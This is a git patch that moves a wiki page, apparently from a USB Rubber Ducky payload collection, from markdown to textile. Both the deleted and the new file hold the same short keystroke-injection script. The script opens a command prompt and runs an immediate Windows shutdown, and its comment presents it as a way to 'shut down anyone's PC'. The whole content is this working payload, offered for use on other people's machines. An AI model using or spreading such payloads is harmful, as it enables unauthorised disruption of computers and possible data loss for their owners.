From 285d9577e1ff2cd3e506b1aa26f129d470f1eadd Mon Sep 17 00:00:00 2001 From: gaspypm Date: Wed, 21 Dec 2016 21:54:52 -0300 Subject: [PATCH] Updated Payload Windows 10 : Shut down (markdown => textile) --- Payload---Windows-10-:-Shut-down.md | 7 ------- Payload---Windows-10-:-Shut-down.textile | 7 +++++++ 2 files changed, 7 insertions(+), 7 deletions(-) delete mode 100644 Payload---Windows-10-:-Shut-down.md create mode 100644 Payload---Windows-10-:-Shut-down.textile diff --git a/Payload---Windows-10-:-Shut-down.md b/Payload---Windows-10-:-Shut-down.md deleted file mode 100644 index 33738c6..0000000 --- a/Payload---Windows-10-:-Shut-down.md +++ /dev/null @@ -1,7 +0,0 @@ -* REM: This is just a simple script that will allow you to quicky shut down anyone's PC with just a few lines of code. -* CONTROL ESCAPE -* DELAY 400 -* STRING cmd -* DELAY 200 -* STRING shutdown.exe /s /t 00 -* ENTER diff --git a/Payload---Windows-10-:-Shut-down.textile b/Payload---Windows-10-:-Shut-down.textile new file mode 100644 index 0000000..d3c238c --- /dev/null +++ b/Payload---Windows-10-:-Shut-down.textile @@ -0,0 +1,7 @@ +REM: This is just a simple script that will allow you to quicky shut down anyone's PC with just a few lines of code. +CONTROL ESCAPE +DELAY 400 +STRING cmd +DELAY 200 +STRING shutdown.exe /s /t 00 +ENTER